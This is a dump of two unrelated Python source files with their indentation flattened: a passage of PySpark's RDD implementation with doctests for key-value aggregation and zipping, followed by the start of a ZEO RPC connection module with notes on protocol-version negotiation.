.. note:: V and C can be different -- for example, one might group an RDD of type
(Int, Int) into an RDD of type (Int, List[Int]).
>>> x = sc.parallelize([("a", 1), ("b", 1), ("a", 2)])
>>> def to_list(a):
... return [a]
...
>>> def append(a, b):
... a.append(b)
... return a
...
>>> def extend(a, b):
... a.extend(b)
... return a
...
>>> sorted(x.combineByKey(to_list, append, extend).collect())
[('a', [1, 2]), ('b', [1])]
"""
if numPartitions is None:
numPartitions = self._defaultReducePartitions()
serializer = self.ctx.serializer
memory = self._memory_limit()
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combineLocally(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combineLocally, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def _mergeCombiners(iterator):
merger = ExternalMerger(agg, memory, serializer)
merger.mergeCombiners(iterator)
return merger.items()
return shuffled.mapPartitions(_mergeCombiners, preservesPartitioning=True)
def aggregateByKey(self, zeroValue, seqFunc, combFunc, numPartitions=None,
partitionFunc=portable_hash):
"""
Aggregate the values of each key, using given combine functions and a neutral
"zero value". This function can return a different result type, U, than the type
of the values in this RDD, V. Thus, we need one operation for merging a V into
a U and one operation for merging two U's, The former operation is used for merging
values within a partition, and the latter is used for merging values between
partitions. To avoid memory allocation, both of these functions are
allowed to modify and return their first argument instead of creating a new U.
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(
lambda v: seqFunc(createZero(), v), seqFunc, combFunc, numPartitions, partitionFunc)
def foldByKey(self, zeroValue, func, numPartitions=None, partitionFunc=portable_hash):
"""
Merge the values for each key using an associative function "func"
and a neutral "zeroValue" which may be added to the result an
arbitrary number of times, and must not change the result
(e.g., 0 for addition, or 1 for multiplication.).
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> from operator import add
>>> sorted(rdd.foldByKey(0, add).collect())
[('a', 2), ('b', 1)]
"""
def createZero():
return copy.deepcopy(zeroValue)
return self.combineByKey(lambda v: func(createZero(), v), func, func, numPartitions,
partitionFunc)
def _memory_limit(self):
return _parse_memory(self.ctx._conf.get("spark.python.worker.memory", "512m"))
# TODO: support variant with custom partitioner
def groupByKey(self, numPartitions=None, partitionFunc=portable_hash):
"""
Group the values for each key in the RDD into a single sequence.
Hash-partitions the resulting RDD with numPartitions partitions.
.. note:: If you are grouping in order to perform an aggregation (such as a
sum or average) over each key, using reduceByKey or aggregateByKey will
provide much better performance.
>>> rdd = sc.parallelize([("a", 1), ("b", 1), ("a", 1)])
>>> sorted(rdd.groupByKey().mapValues(len).collect())
[('a', 2), ('b', 1)]
>>> sorted(rdd.groupByKey().mapValues(list).collect())
[('a', [1, 1]), ('b', [1])]
"""
def createCombiner(x):
return [x]
def mergeValue(xs, x):
xs.append(x)
return xs
def mergeCombiners(a, b):
a.extend(b)
return a
memory = self._memory_limit()
serializer = self._jrdd_deserializer
agg = Aggregator(createCombiner, mergeValue, mergeCombiners)
def combine(iterator):
merger = ExternalMerger(agg, memory * 0.9, serializer)
merger.mergeValues(iterator)
return merger.items()
locally_combined = self.mapPartitions(combine, preservesPartitioning=True)
shuffled = locally_combined.partitionBy(numPartitions, partitionFunc)
def groupByKey(it):
merger = ExternalGroupBy(agg, memory, serializer)
merger.mergeCombiners(it)
return merger.items()
return shuffled.mapPartitions(groupByKey, True).mapValues(ResultIterable)
def flatMapValues(self, f):
"""
Pass each value in the key-value pair RDD through a flatMap function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["x", "y", "z"]), ("b", ["p", "r"])])
>>> def f(x): return x
>>> x.flatMapValues(f).collect()
[('a', 'x'), ('a', 'y'), ('a', 'z'), ('b', 'p'), ('b', 'r')]
"""
flat_map_fn = lambda kv: ((kv[0], x) for x in f(kv[1]))
return self.flatMap(flat_map_fn, preservesPartitioning=True)
def mapValues(self, f):
"""
Pass each value in the key-value pair RDD through a map function
without changing the keys; this also retains the original RDD's
partitioning.
>>> x = sc.parallelize([("a", ["apple", "banana", "lemon"]), ("b", ["grapes"])])
>>> def f(x): return len(x)
>>> x.mapValues(f).collect()
[('a', 3), ('b', 1)]
"""
map_values_fn = lambda kv: (kv[0], f(kv[1]))
return self.map(map_values_fn, preservesPartitioning=True)
def groupWith(self, other, *others):
"""
Alias for cogroup but with support for multiple RDDs.
>>> w = sc.parallelize([("a", 5), ("b", 6)])
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> z = sc.parallelize([("b", 42)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(w.groupWith(x, y, z).collect()))]
[('a', ([5], [1], [2], [])), ('b', ([6], [4], [], [42]))]
"""
return python_cogroup((self, other) + others, numPartitions=None)
# TODO: add variant with custom parittioner
def cogroup(self, other, numPartitions=None):
"""
For each key k in C{self} or C{other}, return a resulting RDD that
contains a tuple with the list of values for that key in C{self} as
well as C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4)])
>>> y = sc.parallelize([("a", 2)])
>>> [(x, tuple(map(list, y))) for x, y in sorted(list(x.cogroup(y).collect()))]
[('a', ([1], [2])), ('b', ([4], []))]
"""
return python_cogroup((self, other), numPartitions)
def sampleByKey(self, withReplacement, fractions, seed=None):
"""
Return a subset of this RDD sampled by key (via stratified sampling).
Create a sample of this RDD using variable sampling rates for
different keys as specified by fractions, a key to sampling rate map.
>>> fractions = {"a": 0.2, "b": 0.1}
>>> rdd = sc.parallelize(fractions.keys()).cartesian(sc.parallelize(range(0, 1000)))
>>> sample = dict(rdd.sampleByKey(False, fractions, 2).groupByKey().collect())
>>> 100 < len(sample["a"]) < 300 and 50 < len(sample["b"]) < 150
True
>>> max(sample["a"]) <= 999 and min(sample["a"]) >= 0
True
>>> max(sample["b"]) <= 999 and min(sample["b"]) >= 0
True
"""
for fraction in fractions.values():
assert fraction >= 0.0, "Negative fraction value: %s" % fraction
return self.mapPartitionsWithIndex(
RDDStratifiedSampler(withReplacement, fractions, seed).func, True)
def subtractByKey(self, other, numPartitions=None):
"""
Return each (key, value) pair in C{self} that has no pair with matching
key in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 2)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtractByKey(y).collect())
[('b', 4), ('b', 5)]
"""
def filter_func(pair):
key, (val1, val2) = pair
return val1 and not val2
return self.cogroup(other, numPartitions).filter(filter_func).flatMapValues(lambda x: x[0])
def subtract(self, other, numPartitions=None):
"""
Return each value in C{self} that is not contained in C{other}.
>>> x = sc.parallelize([("a", 1), ("b", 4), ("b", 5), ("a", 3)])
>>> y = sc.parallelize([("a", 3), ("c", None)])
>>> sorted(x.subtract(y).collect())
[('a', 1), ('b', 4), ('b', 5)]
"""
# note: here 'True' is just a placeholder
rdd = other.map(lambda x: (x, True))
return self.map(lambda x: (x, True)).subtractByKey(rdd, numPartitions).keys()
def keyBy(self, f):
"""
Creates tuples of the elements in this RDD by applying C{f}.
>>> x = sc.parallelize(range(0,3)).keyBy(lambda x: x*x)
>>> y = sc.parallelize(zip(range(0,5), range(0,5)))
>>> [(x, list(map(list, y))) for x, y in sorted(x.cogroup(y).collect())]
[(0, [[0], [0]]), (1, [[1], [1]]), (2, [[], [2]]), (3, [[], [3]]), (4, [[2], [4]])]
"""
return self.map(lambda x: (f(x), x))
def repartition(self, numPartitions):
"""
Return a new RDD that has exactly numPartitions partitions.
Can increase or decrease the level of parallelism in this RDD.
Internally, this uses a shuffle to redistribute data.
If you are decreasing the number of partitions in this RDD, consider
using `coalesce`, which can avoid performing a shuffle.
>>> rdd = sc.parallelize([1,2,3,4,5,6,7], 4)
>>> sorted(rdd.glom().collect())
[[1], [2, 3], [4, 5], [6, 7]]
>>> len(rdd.repartition(2).glom().collect())
2
>>> len(rdd.repartition(10).glom().collect())
10
"""
return self.coalesce(numPartitions, shuffle=True)
def coalesce(self, numPartitions, shuffle=False):
"""
Return a new RDD that is reduced into `numPartitions` partitions.
>>> sc.parallelize([1, 2, 3, 4, 5], 3).glom().collect()
[[1], [2, 3], [4, 5]]
>>> sc.parallelize([1, 2, 3, 4, 5], 3).coalesce(1).glom().collect()
[[1, 2, 3, 4, 5]]
"""
if shuffle:
# Decrease the batch size in order to distribute evenly the elements across output
# partitions. Otherwise, repartition will possibly produce highly skewed partitions.
batchSize = min(10, self.ctx._batchSize or 1024)
ser = BatchedSerializer(PickleSerializer(), batchSize)
selfCopy = self._reserialize(ser)
jrdd_deserializer = selfCopy._jrdd_deserializer
jrdd = selfCopy._jrdd.coalesce(numPartitions, shuffle)
else:
jrdd_deserializer = self._jrdd_deserializer
jrdd = self._jrdd.coalesce(numPartitions, shuffle)
return RDD(jrdd, self.ctx, jrdd_deserializer)
def zip(self, other):
"""
Zips this RDD with another one, returning key-value pairs with the
first element in each RDD second element in each RDD, etc. Assumes
that the two RDDs have the same number of partitions and the same
number of elements in each partition (e.g. one was made through
a map on the other).
>>> x = sc.parallelize(range(0,5))
>>> y = sc.parallelize(range(1000, 1005))
>>> x.zip(y).collect()
[(0, 1000), (1, 1001), (2, 1002), (3, 1003), (4, 1004)]
"""
def get_batch_size(ser):
if isinstance(ser, BatchedSerializer):
return ser.batchSize
return 1 # not batched
def batch_as(rdd, batchSize):
return rdd._reserialize(BatchedSerializer(PickleSerializer(), batchSize))
my_batch = get_batch_size(self._jrdd_deserializer)
other_batch = get_batch_size(other._jrdd_deserializer)
if my_batch != other_batch or not my_batch:
# use the smallest batchSize for both of them
batchSize = min(my_batch, other_batch)
if batchSize <= 0:
# auto batched or unlimited
batchSize = 100
other = batch_as(other, batchSize)
self = batch_as(self, batchSize)
if self.getNumPartitions() != other.getNumPartitions():
raise ValueError("Can only zip with RDD which has the same number of partitions")
# There will be an Exception in JVM if there are different number
# of items in each partitions.
pairRDD = self._jrdd.zip(other._jrdd)
deserializer = PairDeserializer(self._jrdd_deserializer,
other._jrdd_deserializer)
return RDD(pairRDD, self.ctx, deserializer)
def zipWithIndex(self):
"""
Zips this RDD with its element indices.
The ordering is first based on the partition index and then the
ordering of items within each partition. So the first item in
the first partition gets index 0, and the last item in the last
partition receives the largest index.
This method needs to trigger a spark job when this RDD contains
more than one partitions.
>>> sc.parallelize(["a", "b", "c", "d"], 3).zipWithIndex().collect()
[('a', 0), ('b', 1), ('c', 2), ('d', 3)]
"""
starts = [0]
if self.getNumPartitions() > 1:
nums = self.mapPartitions(lambda it: [sum(1 for i in it)]).collect()
for i in range(len(nums) - 1):
starts.append(starts[-1] + nums[i])
def func(k, it):
for i, v in enumerate(it, starts[k]):
yield v, i
return self.mapPartitionsWithIndex(func)
def zipWithUniqueId(self):
"""
Zips this RDD with generated unique Long ids.
Items in the kth partition will get ids k, n+k, 2*n+k, ..., where
n is the number of partitions. So there may exist gaps, but this
method won't trigger a spark job, which is different from
L{zipWithIndex}
>>> sc.parallelize(["a", "b", "c", "d", "e"], 3).zipWithUniqueId().collect()
[('a', 0), ('b', 1), ('c', 4), ('d', 2), ('e', 5)]
"""
n = self.getNumPartitions()
def func(k, it):
for i, v in enumerate(it):
yield v, i * n + k
return self.mapPartitionsWithIndex(func)
def name(self):
"""
Return the name of this RDD.
"""
n = self._jrdd.name()
if n:
return n
@ignore_unicode_prefix
def setName(self, name):
"""
Assign a name to this RDD.
>>> rdd1 = sc.parallelize([1, 2])
>>> rdd1.setName('RDD1').name()
u'RDD1'
"""
self._jrdd.setName(name)
return self
def toDebugString(self):
"""
A description of this RDD and its recursive dependencies for debugging.
"""
debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(sock_info, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
connection.py | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Foundation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE
#
##############################################################################
import asyncore
import errno
import json
import sys
import threading
import logging
from . import marshal
from . import trigger
from . import smac
from .error import ZRPCError, DisconnectedError
from .log import short_repr, log
from ZODB.loglevels import BLATHER, TRACE
import ZODB.POSException
REPLY = ".reply" # message name used for replies
exception_type_type = type(Exception)
debug_zrpc = False
class Delay(object):
"""Used to delay response to client for synchronous calls.
When a synchronous call is made and the original handler returns
without handling the call, it returns a Delay object that prevents
the mainloop from sending a response.
"""
msgid = conn = sent = None
def set_sender(self, msgid, conn):
self.msgid = msgid
self.conn = conn
def reply(self, obj):
self.sent = 'reply'
self.conn.send_reply(self.msgid, obj)
def error(self, exc_info):
self.sent = 'error'
log("Error raised in delayed method", logging.ERROR, exc_info=exc_info)
self.conn.return_error(self.msgid, *exc_info[:2])
def __repr__(self):
return "%s[%s, %r, %r, %r]" % (
self.__class__.__name__, id(self), self.msgid, self.conn, self.sent)
class Result(Delay):
def __init__(self, *args):
self.args = args
def set_sender(self, msgid, conn):
reply, callback = self.args
conn.send_reply(msgid, reply, False)
callback()
class MTDelay(Delay):
def __init__(self):
self.ready = threading.Event()
def set_sender(self, *args):
Delay.set_sender(self, *args)
self.ready.set()
def reply(self, obj):
self.ready.wait()
self.conn.call_from_thread(self.conn.send_reply, self.msgid, obj)
def error(self, exc_info):
self.ready.wait()
log("Error raised in delayed method", logging.ERROR, exc_info=exc_info)
self.conn.call_from_thread(Delay.error, self, exc_info)
# PROTOCOL NEGOTIATION
#
# The code implementing protocol version 2.0.0 (which is deployed
# in the field and cannot be changed) *only* talks to peers that
# send a handshake indicating protocol version 2.0.0. In that
# version, both the client and the server immediately send out
# their protocol handshake when a connection is established,
# without waiting for their peer, and disconnect when a different
# handshake is receive.
#
# The new protocol uses this to enable new clients to talk to
# 2.0.0 servers. In the new protocol:
#
# The server sends its protocol handshake to the client at once.
#
# The client waits until it receives the server's protocol handshake
# before sending its own handshake. The client sends the lower of its
# own protocol version and the server protocol version, allowing it to
# talk to servers using later protocol versions (2.0.2 and higher) as
# well: the effective protocol used will be the lower of the client
# and server protocol. However, this changed in ZODB 3.3.1 (and
# should have changed in ZODB 3.3) because an older server doesn't
# support MVCC methods required by 3.3 clients.
#
# [Ugly details: In order to treat the first received message (protocol
# handshake) differently than all later messages, both client and server
# start by patching their message_input() method to refer to their
# recv_handshake() method instead. In addition, the client has to arrange
# to queue (delay) outgoing messages until it receives the server's
# handshake, so that the first message the client sends to the server is
# the client's handshake. This multiply-special treatment of the first
# message is delicate, and several asyncore and thread subtleties were
# handled unsafely before ZODB 3.2.6.
# ]
#
# The ZEO modules ClientStorage and ServerStub have backwards
# compatibility code for dealing with the previous version of the
# protocol. The client accepts the old version of some messages,
# and will not send new messages when talking to an old server.
#
# As long as the client hasn't sent its handshake, it can't send
# anything else; output messages are queued during this time.
# (Output can happen because the connection testing machinery can
# start sending requests before the handshake is received.)
#
# UPGRADING FROM ZEO 2.0.0 TO NEWER VERSIONS:
#
# Because a new client can talk to an old server, but not vice
# versa, all clients should be upgraded before upgrading any
# servers. Protocol upgrades beyond 2.0.1 will not have this
# restriction, because clients using protocol 2.0.1 or later can
# talk to both older and newer servers.
#
# No compatibility with protocol version 1 is provided.
# Connection is abstract (it must be derived from). ManagedServerConnection
# and ManagedClientConnection are the concrete subclasses. They need to
# supply a handshake() method appropriate for their role in protocol
# negotiation.
class Connection(smac.SizedMessageAsyncConnection, object):
"""Dispatcher for RPC on object on both sides of socket.
The connection supports synchronous calls, which expect a return,
and asynchronous calls, which do not.
It uses the Marshaller class to handle encoding and decoding of
method calls and arguments. Marshaller uses pickle to encode
arbitrary Python objects. The code here doesn't ever see the wire
format.
A Connection is designed for use in a multithreaded application,
where a synchronous call must block until a response is ready.
A socket connection between a client and a server allows either
side to invoke methods on the other side. The processes on each
end of the socket use a Connection object to manage communication.
The Connection deals with decoded RPC messages. They are
represented as four-tuples containing: msgid, flags, method name,
and a tuple of method arguments.
The msgid starts at zero and is incremented by one each time a
method call message is sent. Each side of the connection has a
separate msgid state.
When one side of the connection (the client) calls a method, it
sends a message with a new msgid. The other side (the server),
replies with a message that has the same msgid, the string
".reply" (the global variable REPLY) as the method name, and the
actual return value in the args position. Note that each side of
the Connection can initiate a call, in which case it will be the
client for that particular call.
The protocol also supports asynchronous calls. The client does
not wait for a return value for an asynchronous call.
If a method call raises an Exception, the exception is propagated
back to the client via the REPLY message. The client side will
raise any exception it receives instead of returning the value to
the caller.
"""
__super_init = smac.SizedMessageAsyncConnection.__init__
__super_close = smac.SizedMessageAsyncConnection.close
__super_setSessionKey = smac.SizedMessageAsyncConnection.setSessionKey
# Protocol history:
#
# Z200 -- Original ZEO 2.0 protocol
#
# Z201 -- Added invalidateTransaction() to client.
# Renamed several client methods.
# Added several sever methods:
# lastTransaction()
# getAuthProtocol() and scheme-specific authentication methods
# getExtensionMethods().
# getInvalidations().
#
# Z303 -- named after the ZODB release 3.3
# Added methods for MVCC:
# loadBefore()
# A Z303 client cannot talk to a Z201 server, because the latter
# doesn't support MVCC. A Z201 client can talk to a Z303 server,
# but because (at least) the type of the root object changed
# from ZODB.PersistentMapping to persistent.mapping, the older
# client can't actually make progress if a Z303 client created,
# or ever modified, the root.
#
# Z308 -- named after the ZODB release 3.8
# Added blob-support server methods:
# sendBlob
# storeBlobStart
# storeBlobChunk
# storeBlobEnd
# storeBlobShared
# Added blob-support client methods:
# receiveBlobStart
# receiveBlobChunk
# receiveBlobStop
#
# Z309 -- named after the ZODB release 3.9
# New server methods:
# restorea, iterator_start, iterator_next,
# iterator_record_start, iterator_record_next,
# iterator_gc
#
# Z310 -- named after the ZODB release 3.10
# New server methods:
# undoa
# Doesn't support undo for older clients.
# Undone oid info returned by vote.
#
# Z3101 -- checkCurrentSerialInTransaction
#
# Z4 -- checkCurrentSerialInTransaction
# No-longer call load.
# Protocol variables:
# Our preferred protocol.
current_protocol = b"Z4"
# If we're a client, an exhaustive list of the server protocols we
# can accept.
servers_we_can_talk_to = [b"Z308", b"Z309", b"Z310", b"Z3101",
current_protocol]
# If we're a server, an exhaustive list of the client protocols we
# can accept.
clients_we_can_talk_to = [
b"Z200", b"Z201", b"Z303", b"Z308", b"Z309", b"Z310", b"Z3101",
current_protocol]
# This is pretty excruciating. Details:
#
# 3.3 server 3.2 client
# server sends Z303 to client
# client computes min(Z303, Z201) == Z201 as the protocol to use
# client sends Z201 to server
# OK, because Z201 is in the server's clients_we_can_talk_to
#
# 3.2 server 3.3 client
# server sends Z201 to client
# client computes min(Z303, Z201) == Z201 as the protocol to use
# Z201 isn't in the client's servers_we_can_talk_to, so client
# raises exception
#
# 3.3 server 3.3 client
# server sends Z303 to client
# client computes min(Z303, Z303) == Z303 as the protocol to use
# Z303 is in the client's servers_we_can_talk_to, so client
# sends Z303 to server
# OK, because Z303 is in the server's clients_we_can_talk_to
# Exception types that should not be logged:
unlogged_exception_types = ()
# Client constructor passes b'C' for tag, server constructor b'S'. This
# is used in log messages, and to determine whether we can speak with
# our peer.
def __init__(self, sock, addr, obj, tag, map=None):
self.obj = None
self.decode = marshal.decode
self.encode = marshal.encode
self.fast_encode = marshal.fast_encode
self.closed = False
self.peer_protocol_version = None # set in recv_handshake()
assert tag in b"CS"
self.tag = tag
self.logger = logging.getLogger('ZEO.zrpc.Connection(%r)' % tag)
if isinstance(addr, tuple):
self.log_label = "(%s:%d) " % addr
else:
self.log_label = "(%s) " % addr
# Supply our own socket map, so that we don't get registered with
# the asyncore socket map just yet. The initial protocol messages
# are treated very specially, and we dare not get invoked by asyncore
# before that special-case setup is complete. Some of that setup
# occurs near the end of this constructor, and the rest is done by
# a concrete subclass's handshake() method. Unfortunately, because
# we ultimately derive from asyncore.dispatcher, it's not possible
# to invoke the superclass constructor without asyncore stuffing
# us into _some_ socket map.
ourmap = {}
self.__super_init(sock, addr, map=ourmap)
# The singleton dict is used in synchronous mode when a method
# needs to call into asyncore to try to force some I/O to occur.
# The singleton dict is a socket map containing only this object.
self._singleton = {self._fileno: self}
# waiting_for_reply is used internally to indicate whether
# a call is in progress. setting a session key is deferred
# until after the call returns.
self.waiting_for_reply = False
self.delay_sesskey = None
self.register_object(obj)
# The first message we see is a protocol handshake. message_input()
# is temporarily replaced by recv_handshake() to treat that message
# specially. revc_handshake() does "del self.message_input", which
# uncovers the normal message_input() method thereafter.
self.message_input = self.recv_handshake
# Server and client need to do different things for protocol
# negotiation, and handshake() is implemented differently in each.
self.handshake()
# Now it's safe to register with asyncore's socket map; it was not
# safe before message_input was replaced, or before handshake() was
# invoked.
# Obscure: in Python 2.4, the base asyncore.dispatcher class grew
# a ._map attribute, which is used instead of asyncore's global
# socket map when ._map isn't None. Because we passed `ourmap` to
# the base class constructor above, in 2.4 asyncore believes we want
# to use `ourmap` instead of the global socket map -- but we don't.
# So we have to replace our ._map with the global socket map, and
# update the global socket map with `ourmap`. Replacing our ._map
# isn't necessary before Python 2.4, but doesn't hurt then (it just
# gives us an unused attribute in 2.3); updating the global socket
# map is necessary regardless of Python version.
if map is None:
map = asyncore.socket_map
self._map = map
map.update(ourmap)
def __repr__(self):
return "<%s %s>" % (self.__class__.__name__, self.addr)
__str__ = __repr__ # Defeat asyncore's dreaded __getattr__
def log(self, message, level=BLATHER, exc_info=False):
self.logger.log(level, self.log_label + message, exc_info=exc_info)
def close(self):
self.mgr.close_conn(self)
if self.closed:
return
self._singleton.clear()
self.closed = True
self.__super_close()
self.trigger.pull_trigger()
def register_object(self, obj):
"""Register obj as the true object to invoke methods on."""
self.obj = obj
